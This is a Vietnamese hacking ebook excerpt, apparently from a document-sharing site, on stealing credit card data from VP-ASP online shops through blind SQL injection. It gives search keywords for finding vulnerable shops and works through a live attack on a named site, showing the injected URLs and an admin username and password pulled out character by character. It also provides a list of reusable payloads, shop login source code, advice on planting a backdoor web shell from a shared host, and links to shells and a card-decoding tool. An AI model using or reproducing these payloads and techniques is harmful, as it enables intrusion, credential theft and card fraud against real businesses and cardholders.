Hacking Credit Card – Sql Blind V.1 (Power by Tieuquainho)

10 772 3
Hacking Credit Card – Sql Blind V.1 (Power by Tieuquainho)

Đang tải... (xem toàn văn)

Thông tin tài liệu

------+++----- Ebook Hacking Credit Card Version 2 Lastest And The End. Hack chỉ là để học hỏi và trao dồi kĩ năng bảo mật. Title : Credit Card Should Stop ====== Author: hieupc Email: hieupc@gmail.com Yahoo: hieuitpc@yahoo.com Website: http://thegioiebook.com ============================= Sau khi hieupc hoàn thành phiên bản 1, hieupc cũng đã nghĩ ngay đến phiên bản 2 của Ebook Hacking Credit Card. Và phiên bản Ebook mới này sẽ hoàn thiện và lắp đi những thiếu sót tồn tại ở Ebook cũ. Tutorial đáng chú ý nhất trong Ebook này. Hacking Credit Card Sql Blind V.1 (Power by Tieuquainho) Có một bài viết nằm trong Ebook Hacking Credit Card version 1, có cách hack giống cách này nhưng có vẻ đây là bài viết đầy đủ nhất. Xin giới thiệu sơ qua SQL Blind : • Đây là hình thức khai thác dựa vào lỗ hổng bảo mật của MSSQL, dựa vào lỗ hổng này chúng ta áp dụng những đoạn mã để khai thác và tìm kiếm được thông tin từ Database của Server đó. SQL Blind là kiểu khai thác dò tìm từng ký tự, khi các bạn đã sử dụng đa số các thao thác kỹ thuật hack SQL khác mà không thành công thì có thể tạm nói SQL Blind này có thề khai thông những bế tắc đó, tuy nhiên bên mặt tốt luôn có mặt không tốt đó là quá trình truy vấn SQL Blind tốn rất nhiều thời gian và công sức bởi vì các bạn phải tìm từng ký tự một trong chuỗi cần tìm . VD: tìm link admin thì các bạn phải tìm từng chữ trong chuỗi Database về link admin và ghép chúng lại thành 1 chuỗi. Nói nhiều các bạn rối thôi làm liền cho chắc dễ hiểu. Chuẩn bị : - Trình duyệt Web Opera, Mozila Firefor v1.3 hoặc loại khác Internet Explorer là ok. Không nên xài Internet Explorer để Hack (^|^) - 1 ly nước và 1 cái khăn lau mặt để chữa cháy & lau mồ hôi. Mục tiêu: - Tất cả các Phiên bản từ 5.0 trở về trước của VP-ASP (loại shop tương đối nhiều lỗi và nhiều cc chết (^|^)) - Các Tìm những Shop VP-ASP này thì có thể tham khỏa những từ khóa bên dưới dùng cho việc search trên Google, Yahoo … một site tìm kiếm bất kì nào đó. - Từ Khóa : + shopdisplayproducts.asp?id + shopaddtocart.asp?catalogid= - Tôi chỉ đưa ra 2 từ khóa đó bởi vì nó là những mục tiêu chính giúp 1 trang tìm kiếm có thể tìm ra được VP-ASP. Chúng ta bắt đâu hack 1 site demo nha Mục tiêu là hxxps://circleathletics.com/ (sử dụng VP-ASP V5.0) - đầu tiên chúng ta tìm link admin của site này - hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20 and%20left(fieldvalue,1)='a') Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 139 Như vậy có nghĩa là từ khóa chúng ta đưa ra (a) không phải là ký tự đâu tiên trong chuỗi link admin, chúng ta chợt suy nghĩ đên link admin thường là shopadmin.asp … thử với câu lênh sau thay chữ a = s - hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20 and%20left(fieldvalue,1)='s') Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'xadminpage' to a column of data type int. /shop/shop$db.asp, line 409 - Chính xác là chữ S là ký tự đâu tien của link admin rồi, chúng ta tiếp tục thế những chữ khác và tiếp theo - hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fi eldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20a nd%20left(fieldvalue,2)='sh') - Chú ý chỗ này nha (fieldvalue,2)='sh') - Cú tiếp tục thay tiếp vào đê tìm ra link admin. Link admin kết thúc = .asp nên không cần tìm xem chuỗi ký tự có bao nhiêu ký tự đâu Tiếp theo chúng ta tìm user + pass admin hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser name,1)='a') Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 139 Ko có gì hết tiếp tục như thế hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser name,1)='c') Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value 'circ54' to a column of data type int. /shop/shop$db.asp, line 409 Hiện luôn User ra luôn site này bị lỗi nặng nếu những site khác các bạn động não 1 tí như khi tìm link admin là ok hihi hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser name,2)='ab') đây là cách tìm ký tự thư 2 , thứ 3 thì them vào (fldusername,3)='abc') dậy đó dễ mà. Chúng ta đã có user admin ở trên rồi circ54 tìm pass của nó hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldp assword,1)='a') Microsoft VBScript runtime error '800a000d' Type mismatch: 'clng' /shop/shopproductfeatures.asp, line 13 hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f ldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldp assword,1)='2') Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the varchar value '2005HCP' to a column of data type int. /shop/shop$db.asp, line 409 Vậy là đã hack được thằng này rồi hihi quá dễ phải không các bạn Hy vọng các bạn hiểu mình viết vụng lắm mong mọi người thông cảm Còn đây là 1 số tham khỏa them *************(*** Ti`m link admin *************************************** %20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldna me,10)='xadminpage'%20and%20left(fieldvalue,1)='a') <=== Doan ki tu dau %20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldna me,10)='xadminpage'%20and%20left(fieldvalue,1)='a'%20and%20len(fieldvalue)=15) <=== Tim so ki tu . **************** Ti`m user *********************************************** %20or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,1)='a') <== Ki tu dau %20or 1=(select fldusername from tbluser where admintype='super' and left(fldusername,2)='ab') <== Tim chu~ thu 2 - thu 3 thi the = so 3 va mo` tiep %20or 1=(select fldusername from tbluser where left(fldusername,1)='b' and len(fldusername)=3) <== So ki tu cua user o%20r 1=(select fldusername from tbluser where left(fldusername,1)='a') When not superAdmin *************** Ti`m pass ************************************************ %20or 1=(select fldpassword from tbluser where fldusername='blue42jh' and left(fldpassword,1)='a') <== Ki tu dau %20or 1=(select fldpassword from tbluser where left(fldpassword,1)='b' and len(fldpassword)=3) <== So ki tu Hacking Password thứ 2 của shop ( Nghiên cứu của nobita và hieupc ) Bài viết của nobita: Anh em xem trước code của cái trang login 2 pass: <!--#include file="shop$db.asp"--> <% [COLOR=red]const SecondPassword="[COLOR=blue]password2[/COLOR]" const Secondpasswordmsg="Second password does not match"[/COLOR] '********************************************************************** ' Shop administration only VP-ASP Shopping Cart ' Forces user to login ' asked for userid and password ' Goes to shopadmin1.asp ' Version 4.50 ' September 7, 2002 '********************************************************************* SetSess "ShopAdmin","" SetSess "INIT","" Dim myconn Dim rs Dim username,userpassword msg="" dim rc 'on error resume next If Request("Submit")<>"" Then shopinit SetSess "Login","Force" ShopOpenDatabase myconn If GetSess("Login")="Force" then SetSess "Login","" end if username=request("Username") userpassword=request("password") username=replace(username,"'","") userpassword=replace(userpassword,"'","") if ucase(Username)<>"SUPPLIER" then sql = "select * from tbluser where fldusername='" & username & "' and fldpassword='" & userpassword & "'" Set rs = myconn.Execute(SQL) if not rs.eof then CheckSecondpassword rc If rc=0 then GetAdminData rs else closerecordset rs shopclosedatabase myconn msg=Secondpasswordmsg & "<br>" end if else rs.close set rs=nothing LocateSupplier end if if msg="" then msg=LangAdmin01 & "<br>" end if Shopclosedatabase myconn else msg=LangAdmin01 & "<br>" Shopclosedatabase myconn end if end if AdminPageHeader if msg <> "" Then response.write getconfig("xfont") & msg & "</font>" end if %> <form action="<%=getconfig("xadminpage")%>" method="post" name="LoginForm"> <center><font face=arial size=2 color="#0080C0"><b><%=LangAdmin02%></b></font></center><br> <TABLE WIDTH=300 BORDER=1 CELLPADDING=3 CELLSPACING=0 align="center" bordercolordark="#333399" bordercolorlight="#666699"> <TR> <TD BGCOLOR="#0080C0" COLSPAN=2 ALIGN=LEFT VALIGN=TOP> <font face="Arial, Helvetica" SIZE=2 color=white><B><%=LangAdmin03%></B></FONT></TD> </TR> <TR> <TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica" SIZE=2><B><%=LangAdminUserName%></B></FONT></TD> <TD ALIGN=LEFT VALIGN=TOP> <font face="Arial, Helvetica"><INPUT TYPE=TEXT NAME="UserName" VALUE="<%=Request("UserName") %>"></font></TD> </TR> <TR> <TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica" SIZE=2><B><%=LangAdminPassword%></B></FONT></TD> <TD ALIGN=LEFT VALIGN=TOP><font face="Arial, Helvetica"><INPUT TYPE=PASSWORD NAME="Password"></font></td></TR> <% If Secondpassword<>"" then %> <tr> <TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica" SIZE=2><B><%=LangAdminPassword & "2"%></B></FONT></TD> <TD ALIGN=LEFT VALIGN=TOP><font face="Arial, Helvetica"><INPUT TYPE=PASSWORD NAME="Password2"></font></td></TR> <%end if %> <tr> <td></td> <td><font face="Arial, Helvetica"><INPUT TYPE=SUBMIT VALUE="<%=LangAdminLogin%>" name="Submit"></font></TD> </tr> </TABLE> </form> </center> </BODY> </HTML> <% Sub GetAdminData (rs) setsess "shopadmin" ,rs("fldusername") if isnull(rs("Admintype")) then SetSess "admintype","SUPER" else setsess "admintype",ucase(rs("admintype")) end if setsess "login" , rs("fldusername") setsess "usertables",rs("tablesallowed") setsess "adminmenus",rs("fldaccess") rs.close set rs=nothing LogUser GetSess("ShopAdmin"), "in", myconn SetSess("Supplierid"),"" Shopclosedatabase myconn CheckSecurity (userpassword) Response.redirect "shopadmin1.asp" end sub Sub LocateSupplier If getconfig("xAllowSupplierlogin")<>"Yes" then exit sub sql = "select * from suppliers where supplieruserid='" & username & "' and supplierpassword='" & userpassword & "'" Set rs = myconn.Execute(SQL) If err.number>0 then msg="database Open error<br>" & GetSess("Openerror") else If Not rs.EOF Then setsess "shopadmin" ,request("username") setsess "admintype","supplier" setsess "login" , rs("supplieruserid") setsess("supplierid"),rs("supplierid") rs.close set rs=nothing GetUserTables ' setsess "usertables",rs("tablesallowed") LogUser GetSess("ShopAdmin"), "in", myconn Shopclosedatabase myconn response.redirect "shopadmin1.asp" else rs.close set rs=nothing end if end if end sub Sub GetUserTables dim rs sql = "select * from tbluser where fldusername='supplier'" Set rs = myconn.Execute(SQL) if err.number>0 then msg="database Open error<br>" & GetSess("Openerror") else If Not rs.EOF Then setsess "usertables",rs("tablesallowed") setsess "adminmenus",rs("fldaccess") end if end if rs.close set rs=nothing end sub Sub Checksecurity (ipassword) dim tpassword tpassword=ucase(ipassword) if tpassword="VPASP" or tpassword="ADMIN" then setsess "security","Yes" end if end sub '******************************************************************* ' if using second password facility, the validate it '******************************************************************* Sub CheckSecondPassword(rc) dim password rc=4 If secondpassword="" then rc=0 exit sub end if password=request.form("password2") if password="" then exit sub if ucase(password)<>ucase(secondpassword) then exit sub rc=0 end sub %> Chú ý chỗ chữ đỏ và xanh, đấy là nơi đặt cái pass thứ 2 của shop VPASP. Lúc trước nobita còn có suy luận rằng cái pass 2 này được thằng VPASP fix và nó nằm trong database của shop, nhưng cái này không đúng. Từ cách đặt pass 2 thế này, nobita nghĩ rằng việc làm pass 2 này có thể do thằng webmaster nó edit theo hướng dẫn của VPASP. Cách đặt pass ở các vị trí có thể khác nhau chẳng hạn: CODE <!--#include file="shop$db.asp"--> <!--#include file="pass2.asp"--> <% trong đấy file pass2 chứa password thứ 2 hoặc chỉ đường dẫn của password thứ 2 nằm đâu đó trong cái đống database của shop mà info của nó không thay đổi, tạo 1 table riêng chứa pass2 chẳng hạn . Ngoài những cách đặt pass2 cơ bản này thì cách làm cũng đa dạng tùy thuộc vào trình độ của các webmaster Tuy nhiên trong thời gian vừa qua, có 1 số anh em cho rằng có code để khai thác pass2, nhưng thực chất là dò tìm trong database các table lạ, nhiều khả năng chứa info pass2, ví dụ: CODE affiliates categories configuration coupons customerprices customers dtproperties gifts mycompany oitems orders ordertracking prodcategories prodfeatures products projects quantitydiscounts registrant registryitems reviews searchresults shipmethods pass_access suppliers tblaccess tbllog tbluser CHECK_CONSTRAINTS COLUMN_DOMAIN_USAGE COLUMN_PRIVILEGES COLUMNS CONSTRAINT_COLUMN_USAGE CONSTRAINT_TABLE_USAGE DOMAIN_CONSTRAINTS DOMAINS KEY_COLUMN_USAGE REFERENTIAL_CONSTRAINTS SCHEMATA TABLE_CONSTRAINTS TABLE_PRIVILEGES TABLES VIEW_COLUMN_USAGE VIEW_TABLE_USAGE VIEWS Và cách tìm kiếm này tốn rất nhiều công sức, vì phải tìm đầy đủ các table của nó, mà với kiểu hack hiện nay thì là đoán mò table, hoặc blind từng ký tự của table .Ngồi cả ngày chưa chắc đã ra 1 shop. Tuy nhiên đến nay nobita cũng chưa tìm được giải pháp nào tốt hơn cho loại này . Mong rằng qua bài viết này sẽ giúp anh em tìm kiếm pass2 được tốt hơn . Bài viết của hieupc: Theo kinh nghiệm của hieupc biết được, muốn hack được password thứ 2 của shop ( Secure Pass) thì chỉ có cách hack local là nhanh và gọn nhất, ngoài cách hack local này bạn có thể dựa theo bài viết kinh nghiệm của nobita để mà lấy được pass 2. Có vẻ việc hack local trở nên rất dễ khi bạn có một host trong tay, và chỉ cần upload 1 con backdoor lên chẳng hạn như con remview.php là có thể hack. Tuy nhiên việc này đòi hỏi bạn phải có kiến thức vững về Hosting và DNS. Bạn muốn biết được shop đó nằm ở server nào bạn có thể check DNS hoặc IP để định vị, và từ đó bạn lần theo đó mà đăng kí cho mình 1 host cùng host với shop bạn cần lấy pass 2. Còn việc hack local và check DNS thế nào hay hiểu rõ thêm về host các bạn có thể ghé thăm các trang sau đây để được hướng dẫn cụ thể: http://viethacker.org , http://hvaonline.net và check DNS, kiểm tra thông tin bạn: http://pavietnam.net , http://checkdomain.com , http://whoisc.com , http://check-dns.com . Ngoài ra, còn nhiều trang web khác, bạn có thể lên google.com search. Remview.php : http://php.spb.ru/remview/remview_2003_10_23.zip Ngoài ra còn nhiều Mshell, Backdoor khác có thể kiếm trên google.com hoặc qua trang http://viethacker.org Decode CC bị mã hóa: http://rapidshare.de/files/8343810/decodecc.rar.html (pass unrar : thegioiebook.com ) Những bài cần phải đọc để nắm vững kiến thức Hacking Credit Card. . trong Ebook này. Hacking Credit Card – Sql Blind V. 1 (Power by Tieuquainho) Có một bài viết nằm trong Ebook Hacking Credit Card version 1, có cách hack. ------+++----- Ebook Hacking Credit Card Version 2 – Lastest And The End. Hack chỉ là để học hỏi v trao dồi kĩ năng bảo mật. Title : Credit Card Should Stop

Ngày đăng: 21/10/2013, 23:20

Từ khóa liên quan

Tài liệu cùng người dùng

Tài liệu liên quan